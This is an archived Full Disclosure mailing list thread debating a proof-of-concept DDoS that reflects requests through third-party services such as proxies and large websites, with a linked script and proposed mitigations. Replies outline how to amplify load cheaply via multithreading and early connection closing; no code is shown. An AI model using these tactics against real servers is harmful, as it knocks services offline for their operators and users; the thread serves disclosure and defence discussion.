Full Disclosure mailing list archives

Re: Arbitrary DDoS PoC


From: adam <adam () papsy net>
Date: Mon, 13 Feb 2012 07:48:32 -0600

I have to admit that I've only read the posts here, haven't actually
followed the link, but in response to Gage:

It entirely depends on how it's being done, specifically: what
services/applications are being targeted and in what way. If he's proxying
through "big" servers such as those owned by Facebook, Google, Wikipedia,
etc: then it definitely does make a difference. You're assuming that his
network speed would be the bottleneck, but to make that assumption, you
first have to assume that he's actually waiting around for response data.

Maybe it's too early to convey this in an understandable way, I don't know.
An example scenario that would be effective though: imagine that you run a
web server, also imagine that there's a resource (CPU/bandwidth) intensive
script/page on that server. For the sake of discussion, let's assume that
my home internet speed is 1/10 of your server. We can also probably assume
that your server's network speed is 1/10 of Google's. If I can force
Google's server to request that page, that automatically puts me at an
advantage (especially if I close the connection before Google can send the
response back to me).

Even if you're correct about his particular script, the logic behind your
response is flawed. In the above example, one could use multithreading to
cycle requests to your server through Google, Facebook, Wikipedia, whoever.
As soon as the request has been sent, the connection could be terminated.
If that for some reason wouldn't work, the script could wait until one byte
is received (e.g. the "2" in "200 OK") and close the connection then. At
that point, the bandwidth/resources would have already been used.

The bottom line is that you could easily use the above concepts (and likely
what the OP has designed) to overpower a server/service while using very
little resources of your own. It's all circumstantial anyway though. My
overall point, specifics aside, is that being able to use Google or
Facebook's resources against a target is definitely beneficial and has all
kinds of advantages.

On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom <themadichib0d () gmail com>wrote:

Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent
server with that using a single box. Sending your request through multiple
proxies does not magically increase the resource usage of the target, its
still your output power vs their input pipe. Sure it gives a slight boost
in anonymity and obfuscation but does not actually increase effectiveness.
It would even decrease effectiveness because you bear the burden of having
to send to a proxy, giving them ample time to recover from a given request.

Even if you look at it as a tactic to bypass blacklisting, you still
aren't going to overwhelm the server. That means you need more pawns to do
your bidding. This creates a bit of a problem however as then all your
slaves are running through a limited selection of proxies, reducing the
amount of threats the server needs to blacklist. The circumvention is quite
obvious, which is to not utilize proxies for the pawns....and rely on shear
numbers and/or superior resource exhaustion methods....
 On Feb 13, 2012 4:37 AM, "Lucas Fernando Amorim" <lf.amorim () yahoo com br>
wrote:

With the recent wave of DDoS, a concern that was not taken is the model
where the zombies were not compromised by a Trojan. In the standard
modeling of DDoS attack, the machines are purchased, usually in a VPS,
or are obtained through Trojans, thus forming a botnet. But the
arbitrary shape doesn't need acquire a collection of computers.
Programs, servers and protocols are used to arbitrarily make requests on
the target. P2P programs are especially vulnerable, DNS, internet
proxies, and many sites that make requests of user like Facebook or W3C,
also are.

Precisely I made a proof-of-concept script of 60 lines hitting most of
HTTP servers on the Internet, even if they have protections likely
mod_security, mod_evasive. This can be found on this link [1] at GitHub.
The solution of the problem depends only on the reformulation of
protocols and limitations on the number of concurrent requests and
totals by proxies and programs for a given site, when exceeded returning
a cached copy of the last request.

[1] https://github.com/lfamorim/barrelroll

Cheers,
Lucas Fernando Amorim
http://twitter.com/lfamorim

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: